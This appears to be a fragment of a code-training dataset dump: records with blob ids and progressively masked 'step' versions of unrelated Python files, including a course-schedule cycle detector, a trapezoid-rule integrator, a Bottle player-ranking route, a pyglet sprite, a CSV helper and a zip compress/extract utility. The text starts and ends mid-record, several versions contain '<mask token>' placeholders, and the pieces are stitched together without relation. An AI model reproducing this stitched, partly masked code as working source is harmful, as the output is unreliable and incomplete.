(so if don't remove node in step 3, would incorrectly identify this as a cycle):\n 1 -> 2 -> 3 \n 2 -> 4 -> 3 \n More info: \n 1. Concept of Topological order: for an edge uv, u must always come before v (so no cycles where v also comes before u)\n\n Time Complexity:\n O(V + E):\n 1. Create pre_map: O(P), P: prerequisites\n a. We're iterating through the list of prereqs \n 2. Call dfs: O(C), C: courses\n a. We're iterating through all the courses once \n 3. dfs: O(V + E)\n a. We visit each course and each edge at most once\n\n Space Complexity: O(V + E)\n 1. Create pre_map: O(V + E), V: courses, E: prereqs\n 2. dfs call stack: O(V + E) \n \"\"\"\n\n def can_finish(self, numCourses: int, prerequisites: List[List[int]]\n ) ->bool:\n pre_map = {i: [] for i in range(numCourses)}\n for crs, pre in prerequisites:\n pre_map[crs].append(pre)\n visited_set = set()\n\n def dfs(crs):\n if crs in visited_set:\n return False\n if pre_map[crs] == []:\n return True\n visited_set.add(crs)\n for pre in pre_map[crs]:\n if not dfs(pre):\n return False\n visited_set.remove(crs)\n pre_map[crs] = []\n return True\n for crs in range(numCourses):\n if not dfs(crs):\n return False\n return True\n", "step-4": "from typing import List\n\n\nclass CourseSchedule:\n \"\"\"\n Problem: Course Schedule (#207)\n Key Insights:\n 1. Create adjaceny list of courses to prerequisites.\n 2. Use DFS and visited set to detect a cycle. If there is a cycle, cannot finish all the courses.\n 3. Remember to remove a course (node) from visited set if that course is \"cleared\" (able to take the course). \n 4. Note that this is not a cycle (so if don't remove node in step 3, would incorrectly identify this as a cycle):\n 1 -> 2 -> 3 \n 2 -> 4 -> 3 \n More info: \n 1. Concept of Topological order: for an edge uv, u must always come before v (so no cycles where v also comes before u)\n\n Time Complexity:\n O(V + E):\n 1. Create pre_map: O(P), P: prerequisites\n a. We're iterating through the list of prereqs \n 2. Call dfs: O(C), C: courses\n a. We're iterating through all the courses once \n 3. dfs: O(V + E)\n a. We visit each course and each edge at most once\n\n Space Complexity: O(V + E)\n 1. Create pre_map: O(V + E), V: courses, E: prereqs\n 2. dfs call stack: O(V + E) \n \"\"\"\n\n def can_finish(self, numCourses: int, prerequisites: List[List[int]]\n ) ->bool:\n pre_map = {i: [] for i in range(numCourses)}\n for crs, pre in prerequisites:\n pre_map[crs].append(pre)\n visited_set = set()\n\n def dfs(crs):\n if crs in visited_set:\n return False\n if pre_map[crs] == []:\n return True\n visited_set.add(crs)\n for pre in pre_map[crs]:\n if not dfs(pre):\n return False\n visited_set.remove(crs)\n pre_map[crs] = []\n return True\n for crs in range(numCourses):\n if not dfs(crs):\n return False\n return True\n", "step-5": null, "step-ids": [ 1, 2, 3, 4 ] }
[ 1, 2, 3, 4 ]
import numpy as np """ function for calculating integrals using the trapezoid method x is a vector of independent variables y is a vector of dependent variables a is the initial value b is the final value n is the number of intervals y_generator is the function to be integrated """ def trapezoid_integral(**kwargs): a = kwargs.get('a', None) b = kwargs.get('b', None) n = kwargs.get('n', 2) y_generator = kwargs.get('y_generator', None) x = kwargs.get('x', None) y = kwargs.get('y', None) if y is None: h = (b-a)/n x = np.linspace(a, b, n+1) y = [y_generator(x[i]) for i in range(n+1)] vectors_length = len(x) integral_value = y[0] for i in range(2, vectors_length): integral_value += 2*y[i - 1] integral_value += y[vectors_length - 1] integral_value *= h/2 return integral_value else: sum = 0 for i in range(len(x) - 1): sum += ((y[i] + y[i+1])/2 * (x[i+1] - x[i])) return sum
normal
{ "blob_id": "8ce468460a81c7869f3abb69035a033c58e0f699", "index": 8828, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef trapezoid_integral(**kwargs):\n a = kwargs.get('a', None)\n b = kwargs.get('b', None)\n n = kwargs.get('n', 2)\n y_generator = kwargs.get('y_generator', None)\n x = kwargs.get('x', None)\n y = kwargs.get('y', None)\n if y is None:\n h = (b - a) / n\n x = np.linspace(a, b, n + 1)\n y = [y_generator(x[i]) for i in range(n + 1)]\n vectors_length = len(x)\n integral_value = y[0]\n for i in range(2, vectors_length):\n integral_value += 2 * y[i - 1]\n integral_value += y[vectors_length - 1]\n integral_value *= h / 2\n return integral_value\n else:\n sum = 0\n for i in range(len(x) - 1):\n sum += (y[i] + y[i + 1]) / 2 * (x[i + 1] - x[i])\n return sum\n", "step-3": "import numpy as np\n<mask token>\n\n\ndef trapezoid_integral(**kwargs):\n a = kwargs.get('a', None)\n b = kwargs.get('b', None)\n n = kwargs.get('n', 2)\n y_generator = kwargs.get('y_generator', None)\n x = kwargs.get('x', None)\n y = kwargs.get('y', None)\n if y is None:\n h = (b - a) / n\n x = np.linspace(a, b, n + 1)\n y = [y_generator(x[i]) for i in range(n + 1)]\n vectors_length = len(x)\n integral_value = y[0]\n for i in range(2, vectors_length):\n integral_value += 2 * y[i - 1]\n integral_value += y[vectors_length - 1]\n integral_value *= h / 2\n return integral_value\n else:\n sum = 0\n for i in range(len(x) - 1):\n sum += (y[i] + y[i + 1]) / 2 * (x[i + 1] - x[i])\n return sum\n", "step-4": "import numpy as np\n\n\"\"\"\n function for calculating integrals using the trapezoid method\n x is a vector of independent variables\n y is a vector of dependent variables\n a is the initial value\n b is the final value\n n is the number of intervals\n y_generator is the function to be integrated\n\"\"\"\n\ndef trapezoid_integral(**kwargs):\n\n a = kwargs.get('a', None)\n b = kwargs.get('b', None)\n n = kwargs.get('n', 2)\n y_generator = kwargs.get('y_generator', None)\n\n x = kwargs.get('x', None)\n y = kwargs.get('y', None)\n \n if y is None:\n h = (b-a)/n\n x = np.linspace(a, b, n+1)\n y = [y_generator(x[i]) for i in range(n+1)]\n vectors_length = len(x)\n \n integral_value = y[0]\n\n for i in range(2, vectors_length):\n integral_value += 2*y[i - 1]\n \n integral_value += y[vectors_length - 1]\n integral_value *= h/2\n return integral_value\n \n else:\n sum = 0\n for i in range(len(x) - 1):\n sum += ((y[i] + y[i+1])/2 * (x[i+1] - x[i]))\n return sum\n \n\n\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#!/usr/bin/python # -*- coding: utf-8 -*- from fieldsets import getSingleField, SortAsc from sqlalchemy import func from ladderdb import ElementNotFoundException, EmptyRankingListException from db_entities import Player, Result from bottle import route,request from globe import db,env @route('/player') def output( ): player_name = getSingleField( 'player', request ) order = getSingleField( 'order', request , 'nick') ladder_id = getSingleField( 'ladder', request ) try: s = db.sessionmaker() if player_name: player = db.GetPlayer( player_name ) ladders = db.GetLadderByPlayer( player.id ) played = dict() positions = dict() for ladder in ladders: positions[ladder.id] = db.GetPlayerPosition( ladder.id, player.id ) played[ladder.id] = s.query( Result.id ).filter( Result.ladder_id == ladder.id ).filter( Result.player_id == player.id ).count() results = s.query( Result ).filter( Result.player_id == player.id).order_by(Result.date.desc())[0:5] matches = [] for r in results: matches.append( r.match ) template = env.get_template('viewplayer.html') s.close() return template.render(player=player,ladders=ladders, positions=positions,played=played,matches=matches ) else: asc = getSingleField( 'asc', request, 'False' ) if not asc: asc = 'False' q = s.query( Player, func.count(Result.id).label('played')).outerjoin( (Result, Result.player_id == Player.id ) )\ .filter( Player.id.in_(s.query( Result.player_id ).filter( Player.id == Result.player_id ) ) ) \ .filter( Result.player_id == Player.id ).group_by( Player.id ) if ladder_id: q = q.filter( Player.id.in_( s.query( Result.player_id ).filter( Result.ladder_id == ladder_id ) ) ) if order == 'nick': q = q.order_by( SortAsc( Player.nick, asc ) ) elif order == 'id' : q = q.order_by( SortAsc( Player.id, asc ) ) else: order = 'played' q = q.order_by( SortAsc( func.count(Result.id), asc ) ) limit = int(getSingleField( 'limit', request, q.count() )) offset = int(getSingleField( 'offset', request, 0 )) players = q[offset:offset+limit-1] template = env.get_template('viewplayerlist.html') s.close() return template.render(players=players,offset=offset,limit=limit,order=order,asc=asc ) except ElementNotFoundException, e: err_msg="player %s not found"%(str(player_name)) except EmptyRankingListException, m: err_msg=(str(m)) if s: s.close() template = env.get_template('error.html') return template.render( err_msg=err_msg )
normal
{ "blob_id": "97d128694709c4fe0d9ec2b2749d8e4ec5df7322", "index": 8812, "step-1": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom fieldsets import getSingleField, SortAsc\nfrom sqlalchemy import func\nfrom ladderdb import ElementNotFoundException, EmptyRankingListException\nfrom db_entities import Player, Result\nfrom bottle import route,request\nfrom globe import db,env\n\n@route('/player')\ndef output( ):\n\tplayer_name = getSingleField( 'player', request )\n\torder = getSingleField( 'order', request , 'nick')\n\tladder_id = getSingleField( 'ladder', request )\n\ttry:\n\t\ts = db.sessionmaker()\n\t\tif player_name:\n\t\t\tplayer = db.GetPlayer( player_name )\n\t\t\tladders = db.GetLadderByPlayer( player.id )\n\t\t\tplayed = dict()\n\t\t\tpositions = dict()\n\t\t\tfor ladder in ladders:\n\t\t\t\tpositions[ladder.id] = db.GetPlayerPosition( ladder.id, player.id )\n\t\t\t\tplayed[ladder.id] = s.query( Result.id ).filter( Result.ladder_id == ladder.id ).filter( Result.player_id == player.id ).count()\n\n\t\t\tresults = s.query( Result ).filter( Result.player_id == player.id).order_by(Result.date.desc())[0:5]\n\t\t\tmatches = []\n\t\t\tfor r in results:\n\t\t\t\tmatches.append( r.match )\n\n\t\t\ttemplate = env.get_template('viewplayer.html')\n\t\t\ts.close()\n\t\t\treturn template.render(player=player,ladders=ladders, positions=positions,played=played,matches=matches )\n\t\telse:\n\t\t\tasc = getSingleField( 'asc', request, 'False' )\n\t\t\tif not asc:\n\t\t\t\tasc = 'False'\n\t\t\tq = s.query( Player, func.count(Result.id).label('played')).outerjoin( (Result, Result.player_id == Player.id ) )\\\n\t\t\t\t.filter( Player.id.in_(s.query( Result.player_id ).filter( Player.id == Result.player_id ) ) ) \\\n\t\t\t\t.filter( Result.player_id == Player.id ).group_by( Player.id )\n\t\t\tif ladder_id:\n\t\t\t\tq = q.filter( Player.id.in_( s.query( Result.player_id ).filter( Result.ladder_id == ladder_id ) ) )\n\t\t\tif order == 'nick':\n\t\t\t\tq = q.order_by( SortAsc( Player.nick, asc ) )\n\t\t\telif order == 'id' :\n\t\t\t\tq = q.order_by( SortAsc( Player.id, asc ) )\n\t\t\telse:\n\t\t\t\torder = 'played'\n\t\t\t\tq = q.order_by( SortAsc( func.count(Result.id), asc ) )\n\n\t\t\tlimit = int(getSingleField( 'limit', request, q.count() ))\n\t\t\toffset = int(getSingleField( 'offset', request, 0 ))\n\t\t\tplayers = q[offset:offset+limit-1]\n\t\t\ttemplate = env.get_template('viewplayerlist.html')\n\t\t\ts.close()\n\t\t\treturn template.render(players=players,offset=offset,limit=limit,order=order,asc=asc )\n\n\texcept ElementNotFoundException, e:\n\t\terr_msg=\"player %s not found\"%(str(player_name))\n\n\texcept EmptyRankingListException, m:\n\t\terr_msg=(str(m))\n\tif s:\n\t\ts.close()\n\ttemplate = env.get_template('error.html')\n\treturn template.render( err_msg=err_msg )", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
import pyglet import math from lvl1_resources import fireball class Fire(pyglet.sprite.Sprite): def __init__( self, *args, **kwargs): super(Fire, self).__init__(img= fireball, *args, **kwargs) self.rotation= 45 self.rotate_speed= 5 self.velocity_x= 5 def check_bounds(self): max_x= 1000 + self.image.width/2 if self.x > max_x: self.x= -self.image.width/2 def update(self): self.rotation += self.rotate_speed self.x += self.velocity_x self.check_bounds() def remote_update(self, x, rotation): self.rotation= rotation self.x= x self.check_bounds() def distance(self, point_1=(0, 0), point_2=(0, 0)): """Returns the distance between two points""" return math.sqrt((point_1[0]-point_2[0])**2+(point_1[1]-point_2[1])**2) def collides_with(self, other_object): collision_distance = self.image.width*0.5*self.scale \ + other_object.image.width*0.5*other_object.scale actual_distance = self.distance(self.position, other_object.position) return (actual_distance <= collision_distance)
normal
{ "blob_id": "cf2bbe332237bd849df62be099f1719eaf1f2082", "index": 1523, "step-1": "<mask token>\n\n\nclass Fire(pyglet.sprite.Sprite):\n <mask token>\n <mask token>\n\n def update(self):\n self.rotation += self.rotate_speed\n self.x += self.velocity_x\n self.check_bounds()\n\n def remote_update(self, x, rotation):\n self.rotation = rotation\n self.x = x\n self.check_bounds()\n\n def distance(self, point_1=(0, 0), point_2=(0, 0)):\n \"\"\"Returns the distance between two points\"\"\"\n return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -\n point_2[1]) ** 2)\n\n def collides_with(self, other_object):\n collision_distance = (self.image.width * 0.5 * self.scale + \n other_object.image.width * 0.5 * other_object.scale)\n actual_distance = self.distance(self.position, other_object.position)\n return actual_distance <= collision_distance\n", "step-2": "<mask token>\n\n\nclass Fire(pyglet.sprite.Sprite):\n\n def __init__(self, *args, **kwargs):\n super(Fire, self).__init__(*args, img=fireball, **kwargs)\n self.rotation = 45\n self.rotate_speed = 5\n self.velocity_x = 5\n <mask token>\n\n def update(self):\n self.rotation += self.rotate_speed\n self.x += self.velocity_x\n self.check_bounds()\n\n def remote_update(self, x, rotation):\n self.rotation = rotation\n self.x = x\n self.check_bounds()\n\n def distance(self, point_1=(0, 0), point_2=(0, 0)):\n \"\"\"Returns the distance between two points\"\"\"\n return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -\n point_2[1]) ** 2)\n\n def collides_with(self, other_object):\n collision_distance = (self.image.width * 0.5 * self.scale + \n other_object.image.width * 0.5 * other_object.scale)\n actual_distance = self.distance(self.position, other_object.position)\n return actual_distance <= collision_distance\n", "step-3": "<mask token>\n\n\nclass Fire(pyglet.sprite.Sprite):\n\n def __init__(self, *args, **kwargs):\n super(Fire, self).__init__(*args, img=fireball, **kwargs)\n self.rotation = 45\n self.rotate_speed = 5\n self.velocity_x = 5\n\n def check_bounds(self):\n max_x = 1000 + self.image.width / 2\n if self.x > max_x:\n self.x = -self.image.width / 2\n\n def update(self):\n self.rotation += self.rotate_speed\n self.x += self.velocity_x\n self.check_bounds()\n\n def remote_update(self, x, rotation):\n self.rotation = rotation\n self.x = x\n self.check_bounds()\n\n def distance(self, point_1=(0, 0), point_2=(0, 0)):\n \"\"\"Returns the distance between two points\"\"\"\n return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -\n point_2[1]) ** 2)\n\n def collides_with(self, other_object):\n collision_distance = (self.image.width * 0.5 * self.scale + \n other_object.image.width * 0.5 * other_object.scale)\n actual_distance = self.distance(self.position, other_object.position)\n return actual_distance <= collision_distance\n", "step-4": "import pyglet\nimport math\nfrom lvl1_resources import fireball\n\n\nclass Fire(pyglet.sprite.Sprite):\n\n def __init__(self, *args, **kwargs):\n super(Fire, self).__init__(*args, img=fireball, **kwargs)\n self.rotation = 45\n self.rotate_speed = 5\n self.velocity_x = 5\n\n def check_bounds(self):\n max_x = 1000 + self.image.width / 2\n if self.x > max_x:\n self.x = -self.image.width / 2\n\n def update(self):\n self.rotation += self.rotate_speed\n self.x += self.velocity_x\n self.check_bounds()\n\n def remote_update(self, x, rotation):\n self.rotation = rotation\n self.x = x\n self.check_bounds()\n\n def distance(self, point_1=(0, 0), point_2=(0, 0)):\n \"\"\"Returns the distance between two points\"\"\"\n return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -\n point_2[1]) ** 2)\n\n def collides_with(self, other_object):\n collision_distance = (self.image.width * 0.5 * self.scale + \n other_object.image.width * 0.5 * other_object.scale)\n actual_distance = self.distance(self.position, other_object.position)\n return actual_distance <= collision_distance\n", "step-5": "import pyglet\nimport math\nfrom lvl1_resources import fireball\n\nclass Fire(pyglet.sprite.Sprite):\n\tdef __init__( self, *args, **kwargs):\n\t\tsuper(Fire, self).__init__(img= fireball, *args, **kwargs)\n\t\tself.rotation= 45\n\t\tself.rotate_speed= 5\n\t\tself.velocity_x= 5\n\n\tdef check_bounds(self):\n\t\tmax_x= 1000 + self.image.width/2\n\t\tif self.x > max_x:\n\t\t\tself.x= -self.image.width/2\n\n\tdef update(self):\n\t\tself.rotation += self.rotate_speed\n\t\tself.x += self.velocity_x\n\t\tself.check_bounds()\n\n\tdef remote_update(self, x, rotation):\n\t\tself.rotation= rotation\n\t\tself.x= x\n\t\tself.check_bounds()\n\n\tdef distance(self, point_1=(0, 0), point_2=(0, 0)):\n\t\t\"\"\"Returns the distance between two points\"\"\"\n\t\treturn math.sqrt((point_1[0]-point_2[0])**2+(point_1[1]-point_2[1])**2)\n\n\tdef collides_with(self, other_object):\n\n\t\tcollision_distance = self.image.width*0.5*self.scale \\\n + other_object.image.width*0.5*other_object.scale\n \n\t\tactual_distance = self.distance(self.position, other_object.position)\n \n\t\treturn (actual_distance <= collision_distance)\n", "step-ids": [ 5, 6, 7, 8, 9 ] }
[ 5, 6, 7, 8, 9 ]
# -*- coding: utf-8 -*- """ Created on Sun Jan 28 12:54:27 2018 @author: Alex """ import numpy as np def saveListToCSV(filepath, _list): with open(filepath,'ab') as f: np.savetxt(f, [_list], delimiter=',', fmt='%f')
normal
{ "blob_id": "555f4e41661ff4cbf4b9d72feab41ca8b7da2d5f", "index": 750, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef saveListToCSV(filepath, _list):\n with open(filepath, 'ab') as f:\n np.savetxt(f, [_list], delimiter=',', fmt='%f')\n", "step-3": "<mask token>\nimport numpy as np\n\n\ndef saveListToCSV(filepath, _list):\n with open(filepath, 'ab') as f:\n np.savetxt(f, [_list], delimiter=',', fmt='%f')\n", "step-4": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 28 12:54:27 2018\n\n@author: Alex\n\"\"\"\n\nimport numpy as np\n\ndef saveListToCSV(filepath, _list):\n with open(filepath,'ab') as f:\n np.savetxt(f, [_list], delimiter=',', fmt='%f')", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
""" PROYECTO : Portal EDCA-HN NOMBRE : ZipTools Descripcion : Clase utilitaria para descomprimir archivos ZIP. MM/DD/YYYY Colaboradores Descripcion 05/07/2019 Alla Duenas Creacion. """ import zipfile from edca_mensajes import EdcaErrores as err, EdcaMensajes as msg from edca_logs.EdcaLogger import EdcaLogger as log class ZipTools: # Funcion para cromprimir los archivos descargados @staticmethod def comprimir(archivo, dir_comprimir): __archivo_zip = archivo[:archivo.find(".")] + ".zip" try: with zipfile.ZipFile(__archivo_zip,'w', zipfile.ZIP_DEFLATED) as archivoZip: archivoZip.write(archivo) archivoZip.close() except PermissionError: log.registrar_log_error(__name__, err.EdcaErrores.ERR_ZIPTOOL_UNZIP, "EXTRAER ARCHIVO", msg.EdcaMensajes.obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % PermissionError.filename % PermissionError.strerror) except IOError: log.registrar_log_error(__name__, err.EdcaErrores.ERR_ZIPTOOL_UNZIP, "EXTRAER ARCHIVO", msg.EdcaMensajes.obt_mensaje( err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.filename % IOError.strerror) # Funcion para descromprimir los archivos descargados @staticmethod def descomprimir(archivo, dir_extraer): try: zip_ref = zipfile.ZipFile(archivo, 'r') zip_list = zip_ref.infolist() for contenido in zip_list: log.registrar_log_info(__name__, err.EdcaErrores.INFO_ZIPTOOL_PRINT_DIR, "EXTRAER ARCHIVO", msg.EdcaMensajes.obt_mensaje(err.EdcaErrores.INFO_ZIPTOOL_PRINT_DIR) % contenido.filename) zip_ref.extractall(dir_extraer) zip_ref.close() log.registrar_log_info(__name__, err.EdcaErrores.INFO_ZIPTOOL_UNZIP, "EXTRAER ARCHIVO", msg.EdcaMensajes.obt_mensaje(err.EdcaErrores.INFO_ZIPTOOL_UNZIP)) except PermissionError: log.registrar_log_error(__name__, err.EdcaErrores.ERR_ZIPTOOL_UNZIP, "EXTRAER ARCHIVO", msg.EdcaMensajes.obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % PermissionError.filename % PermissionError.strerror) except IOError: log.registrar_log_error(__name__, err.EdcaErrores.ERR_ZIPTOOL_UNZIP, "EXTRAER ARCHIVO", msg.EdcaMensajes.obt_mensaje( err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.filename % IOError.strerror) @staticmethod def obtener_contenido_zip(archivo): global zp try: zip_ref = zipfile.ZipFile(archivo, 'r') zip_list = zip_ref.infolist() for contenido in zip_list: zp = contenido.filename zip_ref.close() return zp except PermissionError: log.registrar_log_error(__name__, err.EdcaErrores.ERR_ZIPTOOL_UNZIP, "EXTRAER ARCHIVO", msg.EdcaMensajes.obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % PermissionError.filename % PermissionError.strerror) except IOError: log.registrar_log_error(__name__, err.EdcaErrores.ERR_ZIPTOOL_UNZIP, "EXTRAER ARCHIVO", msg.EdcaMensajes.obt_mensaje( err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.filename % IOError.strerror)
normal
{ "blob_id": "1190e802fde6c2c6f48bd2720688bd9231b622e0", "index": 6564, "step-1": "<mask token>\n\n\nclass ZipTools:\n <mask token>\n\n @staticmethod\n def descomprimir(archivo, dir_extraer):\n try:\n zip_ref = zipfile.ZipFile(archivo, 'r')\n zip_list = zip_ref.infolist()\n for contenido in zip_list:\n log.registrar_log_info(__name__, err.EdcaErrores.\n INFO_ZIPTOOL_PRINT_DIR, 'EXTRAER ARCHIVO', msg.\n EdcaMensajes.obt_mensaje(err.EdcaErrores.\n INFO_ZIPTOOL_PRINT_DIR) % contenido.filename)\n zip_ref.extractall(dir_extraer)\n zip_ref.close()\n log.registrar_log_info(__name__, err.EdcaErrores.\n INFO_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.INFO_ZIPTOOL_UNZIP))\n except PermissionError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) %\n PermissionError.filename % PermissionError.strerror)\n except IOError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.\n filename % IOError.strerror)\n <mask token>\n", "step-2": "<mask token>\n\n\nclass ZipTools:\n <mask token>\n\n @staticmethod\n def descomprimir(archivo, dir_extraer):\n try:\n zip_ref = zipfile.ZipFile(archivo, 'r')\n zip_list = zip_ref.infolist()\n for contenido in zip_list:\n log.registrar_log_info(__name__, err.EdcaErrores.\n INFO_ZIPTOOL_PRINT_DIR, 'EXTRAER ARCHIVO', msg.\n EdcaMensajes.obt_mensaje(err.EdcaErrores.\n INFO_ZIPTOOL_PRINT_DIR) % contenido.filename)\n zip_ref.extractall(dir_extraer)\n zip_ref.close()\n log.registrar_log_info(__name__, err.EdcaErrores.\n INFO_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.INFO_ZIPTOOL_UNZIP))\n except PermissionError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) %\n PermissionError.filename % PermissionError.strerror)\n except IOError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.\n filename % IOError.strerror)\n\n @staticmethod\n def obtener_contenido_zip(archivo):\n global zp\n try:\n zip_ref = zipfile.ZipFile(archivo, 'r')\n zip_list = zip_ref.infolist()\n for contenido in zip_list:\n zp = contenido.filename\n zip_ref.close()\n return zp\n except PermissionError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) %\n PermissionError.filename % PermissionError.strerror)\n except IOError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.\n filename % IOError.strerror)\n", "step-3": "<mask token>\n\n\nclass ZipTools:\n\n @staticmethod\n def comprimir(archivo, dir_comprimir):\n __archivo_zip = archivo[:archivo.find('.')] + '.zip'\n try:\n with zipfile.ZipFile(__archivo_zip, 'w', zipfile.ZIP_DEFLATED\n ) as archivoZip:\n archivoZip.write(archivo)\n archivoZip.close()\n except PermissionError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) %\n PermissionError.filename % PermissionError.strerror)\n except IOError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.\n filename % IOError.strerror)\n\n @staticmethod\n def descomprimir(archivo, dir_extraer):\n try:\n zip_ref = zipfile.ZipFile(archivo, 'r')\n zip_list = zip_ref.infolist()\n for contenido in zip_list:\n log.registrar_log_info(__name__, err.EdcaErrores.\n INFO_ZIPTOOL_PRINT_DIR, 'EXTRAER ARCHIVO', msg.\n EdcaMensajes.obt_mensaje(err.EdcaErrores.\n INFO_ZIPTOOL_PRINT_DIR) % contenido.filename)\n zip_ref.extractall(dir_extraer)\n zip_ref.close()\n log.registrar_log_info(__name__, err.EdcaErrores.\n INFO_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.INFO_ZIPTOOL_UNZIP))\n except PermissionError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) %\n PermissionError.filename % PermissionError.strerror)\n except IOError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.\n filename % IOError.strerror)\n\n @staticmethod\n def obtener_contenido_zip(archivo):\n global zp\n try:\n zip_ref = zipfile.ZipFile(archivo, 'r')\n zip_list = zip_ref.infolist()\n for contenido in zip_list:\n zp = contenido.filename\n zip_ref.close()\n return zp\n except PermissionError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) %\n PermissionError.filename % PermissionError.strerror)\n except IOError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.\n filename % IOError.strerror)\n", "step-4": "<mask token>\nimport zipfile\nfrom edca_mensajes import EdcaErrores as err, EdcaMensajes as msg\nfrom edca_logs.EdcaLogger import EdcaLogger as log\n\n\nclass ZipTools:\n\n @staticmethod\n def comprimir(archivo, dir_comprimir):\n __archivo_zip = archivo[:archivo.find('.')] + '.zip'\n try:\n with zipfile.ZipFile(__archivo_zip, 'w', zipfile.ZIP_DEFLATED\n ) as archivoZip:\n archivoZip.write(archivo)\n archivoZip.close()\n except PermissionError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) %\n PermissionError.filename % PermissionError.strerror)\n except IOError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.\n filename % IOError.strerror)\n\n @staticmethod\n def descomprimir(archivo, dir_extraer):\n try:\n zip_ref = zipfile.ZipFile(archivo, 'r')\n zip_list = zip_ref.infolist()\n for contenido in zip_list:\n log.registrar_log_info(__name__, err.EdcaErrores.\n INFO_ZIPTOOL_PRINT_DIR, 'EXTRAER ARCHIVO', msg.\n EdcaMensajes.obt_mensaje(err.EdcaErrores.\n INFO_ZIPTOOL_PRINT_DIR) % contenido.filename)\n zip_ref.extractall(dir_extraer)\n zip_ref.close()\n log.registrar_log_info(__name__, err.EdcaErrores.\n INFO_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.INFO_ZIPTOOL_UNZIP))\n except PermissionError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) %\n PermissionError.filename % PermissionError.strerror)\n except IOError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.\n filename % IOError.strerror)\n\n @staticmethod\n def obtener_contenido_zip(archivo):\n global zp\n try:\n zip_ref = 